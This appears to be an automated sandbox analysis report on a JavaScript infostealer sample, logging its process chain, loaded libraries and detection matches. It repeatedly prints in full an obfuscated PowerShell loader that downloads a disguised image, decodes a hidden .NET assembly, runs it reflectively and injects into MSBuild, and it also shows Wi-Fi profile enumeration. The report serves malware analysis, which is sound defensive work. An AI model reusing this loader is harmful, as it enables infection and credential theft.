          Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredText = $originalText -replace '#', 't';$ImGAeKuoWcnmOsioRbWc = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$zKmKBBAfbUGnsWxhAiiz = New-Object System.Net.WebClient;$tZUoLPcfaNfWNPPuuQNL = $zKmKBBAfbUGnsWxhAiiz.DownloadData($ImGAeKuoWcnmOsioRbWc);$UoOZAzuAcLvSicAcLKuh = [System.Text.Encoding]::UTF8.GetString($tZUoLPcfaNfWNPPuuQNL);$CkcWWOGxjxbeZAUGPTSp = '<<BASE64_START>>';$ZrcCaGWcoRxzHkkulGiZ = '<<BASE64_END>>';$CbqKcPceQgaPcoZgIaAi = $UoOZAzuAcLvSicAcLKuh.IndexOf($CkcWWOGxjxbeZAUGPTSp);$tmpOdLZZHhJCGJfWbiRf = $UoOZAzuAcLvSicAcLKuh.IndexOf($ZrcCaGWcoRxzHkkulGiZ);$CbqKcPceQgaPcoZgIaAi -ge 0 -and $tmpOdLZZHhJCGJfWbiRf -gt $CbqKcPceQgaPcoZgIaAi;$CbqKcPceQgaPcoZgIaAi += $CkcWWOGxjxbeZAUGPTSp.Length;$aWiLuziLfnZnGLeRZrin = $tmpOdLZZHhJCGJfWbiRf - $CbqKcPceQgaPcoZgIaAi;$siibUOizcbQuLNGKWfWc = $UoOZAzuAcLvSicAcLKuh.Substring($CbqKcPceQgaPcoZgIaAi, $aWiLuziLfnZnGLeRZrin);$uSqTKGlifAbAKeLRUmfk = -join ($siibUOizcbQuLNGKWfWc.ToCharArray() | ForEach-Object { $_ })[-1..-($siibUOizcbQuLNGKWfWc.Length)];$iqfeZGJtzAJhdcBqdzmR = [System.Convert]::FromBase64String($uSqTKGlifAbAKeLRUmfk);$nZGHGkTBZPiLBmWnLiec = [System.Reflection.Assembly]::Load($iqfeZGJtzAJhdcBqdzmR);$qbPKWBeczbjsBndzhNnZ = [dnlib.IO.Home].GetMethod('VAI');$qbPKWBeczbjsBndzhNnZ.Invoke($null, @($restoredText, 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'MSBuild', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','1','WfWxdqKLzhtiOjUlGsfz','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredText = $originalText -replace '#', 't';$ImGAeKuoWcnmOsioRbWc = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$zKmKBBAfbUGnsWxhAiiz = New-Object System.Net.WebClient;$tZUoLPcfaNfWNPPuuQNL = $zKmKBBAfbUGnsWxhAiiz.DownloadData($ImGAeKuoWcnmOsioRbWc);$UoOZAzuAcLvSicAcLKuh = [System.Text.Encoding]::UTF8.GetString($tZUoLPcfaNfWNPPuuQNL);$CkcWWOGxjxbeZAUGPTSp = '<<BASE64_START>>';$ZrcCaGWcoRxzHkkulGiZ = '<<BASE64_END>>';$CbqKcPceQgaPcoZgIaAi = $UoOZAzuAcLvSicAcLKuh.IndexOf($CkcWWOGxjxbeZAUGPTSp);$tmpOdLZZHhJCGJfWbiRf = $UoOZAzuAcLvSicAcLKuh.IndexOf($ZrcCaGWcoRxzHkkulGiZ);$CbqKcPceQgaPcoZgIaAi -ge 0 -and $tmpOdLZZHhJCGJfWbiRf -gt $CbqKcPceQgaPcoZgIaAi;$CbqKcPceQgaPcoZgIaAi += $CkcWWOGxjxbeZAUGPTSp.Length;$aWiLuziLfnZnGLeRZrin = $tmpOdLZZHhJCGJfWbiRf - $CbqKcPceQgaPcoZgIaAi;$siibUOizcbQuLNGKWfWc = $UoOZAzuAcLvSicAcLKuh.Substring($CbqKcPceQgaPcoZgIaAi, $aWiLuziLfnZnGLeRZrin);$uSqTKGlifAbAKeLRUmfk = -join ($siibUOizcbQuLNGKWfWc.ToCharArray() | ForEach-Object { $_ })[-1..-($siibUOizcbQuLNGKWfWc.Length)];$iqfeZGJtzAJhdcBqdzmR = [System.Convert]::FromBase64String($uSqTKGlifAbAKeLRUmfk);$nZGHGkTBZPiLBmWnLiec = [System.Reflection.Assembly]::Load($iqfeZGJtzAJhdcBqdzmR);$qbPKWBeczbjsBndzhNnZ = [dnlib.IO.Home].GetMethod('VAI');$qbPKWBeczbjsBndzhNnZ.Invoke($null, @($restoredText, 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'MSBuild', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','1','WfWxdqKLzhtiOjUlGsfz','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0314F7587_2_0314F758
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0314EE887_2_0314EE88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0314EB407_2_0314EB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_059435407_2_05943540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0594350F7_2_0594350F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_05DE7CD97_2_05DE7CD9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_05DEDFF87_2_05DEDFF8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_05DE8E387_2_05DE8E38
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_05E1E4187_2_05E1E418
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_05E1E7787_2_05E1E778
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_05F7D0C07_2_05F7D0C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_061183907_2_06118390
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_061183807_2_06118380
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_05F71D407_2_05F71D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_05F71D2E7_2_05F71D2E
          Source: Inquiry.jsInitial sample: Strings found which are bigger than 50
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2401
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2401Jump to behavior
          Source: Process Memory Space: powershell.exe PID: 2596, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winJS@18/23@7/6
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\rVRbIsie[1].txtJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6016:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1596:120:WilError_03
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\445817
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_atngye50.vwv.ps1Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: MSBuild.exe, 00000007.00000002.2118047859.0000000003402000.00000004.00000800.00020000.00000000.sdmp, tmp265.tmp.dat.7.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: Inquiry.jsVirustotal: Detection: 8%
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Inquiry.js"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredText = $originalText -replace '#', 't';$ImGAeKuoWcnmOsioRbWc = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$zKmKBBAfbUGnsWxhAiiz = New-Object System.Net.WebClient;$tZUoLPcfaNfWNPPuuQNL = $zKmKBBAfbUGnsWxhAiiz.DownloadData($ImGAeKuoWcnmOsioRbWc);$UoOZAzuAcLvSicAcLKuh = [System.Text.Encoding]::UTF8.GetString($tZUoLPcfaNfWNPPuuQNL);$CkcWWOGxjxbeZAUGPTSp = '<<BASE64_START>>';$ZrcCaGWcoRxzHkkulGiZ = '<<BASE64_END>>';$CbqKcPceQgaPcoZgIaAi = $UoOZAzuAcLvSicAcLKuh.IndexOf($CkcWWOGxjxbeZAUGPTSp);$tmpOdLZZHhJCGJfWbiRf = $UoOZAzuAcLvSicAcLKuh.IndexOf($ZrcCaGWcoRxzHkkulGiZ);$CbqKcPceQgaPcoZgIaAi -ge 0 -and $tmpOdLZZHhJCGJfWbiRf -gt $CbqKcPceQgaPcoZgIaAi;$CbqKcPceQgaPcoZgIaAi += $CkcWWOGxjxbeZAUGPTSp.Length;$aWiLuziLfnZnGLeRZrin = $tmpOdLZZHhJCGJfWbiRf - $CbqKcPceQgaPcoZgIaAi;$siibUOizcbQuLNGKWfWc = $UoOZAzuAcLvSicAcLKuh.Substring($CbqKcPceQgaPcoZgIaAi, $aWiLuziLfnZnGLeRZrin);$uSqTKGlifAbAKeLRUmfk = -join ($siibUOizcbQuLNGKWfWc.ToCharArray() | ForEach-Object { $_ })[-1..-($siibUOizcbQuLNGKWfWc.Length)];$iqfeZGJtzAJhdcBqdzmR = [System.Convert]::FromBase64String($uSqTKGlifAbAKeLRUmfk);$nZGHGkTBZPiLBmWnLiec = [System.Reflection.Assembly]::Load($iqfeZGJtzAJhdcBqdzmR);$qbPKWBeczbjsBndzhNnZ = [dnlib.IO.Home].GetMethod('VAI');$qbPKWBeczbjsBndzhNnZ.Invoke($null, @($restoredText, 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'MSBuild', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','1','WfWxdqKLzhtiOjUlGsfz','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
          Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredText = $originalText -replace '#', 't';$ImGAeKuoWcnmOsioRbWc = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$zKmKBBAfbUGnsWxhAiiz = New-Object System.Net.WebClient;$tZUoLPcfaNfWNPPuuQNL = $zKmKBBAfbUGnsWxhAiiz.DownloadData($ImGAeKuoWcnmOsioRbWc);$UoOZAzuAcLvSicAcLKuh = [System.Text.Encoding]::UTF8.GetString($tZUoLPcfaNfWNPPuuQNL);$CkcWWOGxjxbeZAUGPTSp = '<<BASE64_START>>';$ZrcCaGWcoRxzHkkulGiZ = '<<BASE64_END>>';$CbqKcPceQgaPcoZgIaAi = $UoOZAzuAcLvSicAcLKuh.IndexOf($CkcWWOGxjxbeZAUGPTSp);$tmpOdLZZHhJCGJfWbiRf = $UoOZAzuAcLvSicAcLKuh.IndexOf($ZrcCaGWcoRxzHkkulGiZ);$CbqKcPceQgaPcoZgIaAi -ge 0 -and $tmpOdLZZHhJCGJfWbiRf -gt $CbqKcPceQgaPcoZgIaAi;$CbqKcPceQgaPcoZgIaAi += $CkcWWOGxjxbeZAUGPTSp.Length;$aWiLuziLfnZnGLeRZrin = $tmpOdLZZHhJCGJfWbiRf - $CbqKcPceQgaPcoZgIaAi;$siibUOizcbQuLNGKWfWc = $UoOZAzuAcLvSicAcLKuh.Substring($CbqKcPceQgaPcoZgIaAi, $aWiLuziLfnZnGLeRZrin);$uSqTKGlifAbAKeLRUmfk = -join ($siibUOizcbQuLNGKWfWc.ToCharArray() | ForEach-Object { $_ })[-1..-($siibUOizcbQuLNGKWfWc.Length)];$iqfeZGJtzAJhdcBqdzmR = [System.Convert]::FromBase64String($uSqTKGlifAbAKeLRUmfk);$nZGHGkTBZPiLBmWnLiec = [System.Reflection.Assembly]::Load($iqfeZGJtzAJhdcBqdzmR);$qbPKWBeczbjsBndzhNnZ = [dnlib.IO.Home].GetMethod('VAI');$qbPKWBeczbjsBndzhNnZ.Invoke($null, @($restoredText, 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'MSBuild', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','1','WfWxdqKLzhtiOjUlGsfz','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profileJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
